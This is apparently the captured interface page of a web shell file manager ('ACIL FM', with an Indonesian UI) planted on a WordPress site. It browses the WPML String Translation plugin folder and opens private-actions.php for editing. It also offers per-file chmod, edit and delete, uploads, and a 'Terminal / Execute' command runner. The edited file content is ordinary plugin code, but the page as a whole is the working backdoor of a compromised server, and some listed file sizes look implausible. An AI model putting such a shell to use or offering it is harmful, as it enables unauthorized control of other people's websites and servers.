ACIL FM
Dark
Refresh
Current DIR:
/home/mhhtmff/www/site/wp-content/plugins/wpml-string-translation/inc
/
home
mhhtmff
www
site
wp-content
plugins
wpml-string-translation
inc
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
admin-texts
-
chmod
Open
Rename
Delete
gettext
-
chmod
Open
Rename
Delete
package-translation
-
chmod
Open
Rename
Delete
auto-download-locales.php
13.85 MB
chmod
View
DL
Edit
Rename
Delete
constants.php
1.13 MB
chmod
View
DL
Edit
Rename
Delete
functions-load.php
493 B
chmod
View
DL
Edit
Rename
Delete
functions.php
34.02 MB
chmod
View
DL
Edit
Rename
Delete
lang-map.csv
865 B
chmod
View
DL
Edit
Rename
Delete
potx-callback.php
994 B
chmod
View
DL
Edit
Rename
Delete
potx.php
24.48 MB
chmod
View
DL
Edit
Rename
Delete
private-actions.php
2.13 MB
chmod
View
DL
Edit
Rename
Delete
private-filters.php
1.88 MB
chmod
View
DL
Edit
Rename
Delete
wpml-localization.class.php
4.94 MB
chmod
View
DL
Edit
Rename
Delete
wpml-st-string-update.class.php
6.26 MB
chmod
View
DL
Edit
Rename
Delete
wpml-string-translation.class.php
29.69 MB
chmod
View
DL
Edit
Rename
Delete
Edit file: /home/mhhtmff/www/site/wp-content/plugins/wpml-string-translation/inc/private-actions.php
<?php function wpml_st_parse_config( $file_or_object ) { global $wpdb; require_once WPML_ST_PATH . '/inc/admin-texts/wpml-admin-text-import.class.php'; $config = new WPML_Admin_Text_Configuration( $file_or_object ); $config_array = $config->get_config_array(); if ( ! empty( $config_array ) ) { $config_handler = $file_or_object; if ( isset( $file_or_object->type, $file_or_object->admin_text_context ) ) { $config_handler = $file_or_object->type . $file_or_object->admin_text_context; } $st_records = new WPML_ST_Records( $wpdb ); $import = new WPML_Admin_Text_Import( $st_records, new WPML_WP_API() ); $config_handler_hash = md5( serialize( $config_handler ) ); $import->parse_config( $config_array, $config_handler_hash ); } } add_action( 'wpml_parse_config_file', 'wpml_st_parse_config', 10, 1 ); add_action( 'wpml_parse_custom_config', 'wpml_st_parse_config', 10, 1 ); /** * Action run on the wp_loaded hook that registers widget titles, * tagline and bloginfo as well as the current theme's strings when * String translation is first activated */ function wpml_st_initialize_basic_strings() { /** @var WPML_String_Translation $WPML_String_Translation */ global $sitepress, $pagenow, $WPML_String_Translation; $load_action = new WPML_ST_WP_Loaded_Action( $sitepress, $WPML_String_Translation, $pagenow, isset( $_GET['page'] ) ? $_GET['page'] : '' ); if ( $sitepress->is_setup_complete() ) { $load_action->run(); } } if ( is_admin() ) { add_action( 'wp_loaded', 'wpml_st_initialize_basic_strings' ); } /** * @param string $old * @param string $new */ function icl_st_update_blogname_actions( $old, $new ) { icl_st_update_string_actions( WPML_ST_Blog_Name_And_Description_Hooks::STRING_DOMAIN, WPML_ST_Blog_Name_And_Description_Hooks::STRING_NAME_BLOGNAME, $old, $new, true ); } /** * @param string $old * @param string $new */ function icl_st_update_blogdescription_actions( $old, $new ) { icl_st_update_string_actions( WPML_ST_Blog_Name_And_Description_Hooks::STRING_DOMAIN, WPML_ST_Blog_Name_And_Description_Hooks::STRING_NAME_BLOGDESCRIPTION, $old, $new, true ); }
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply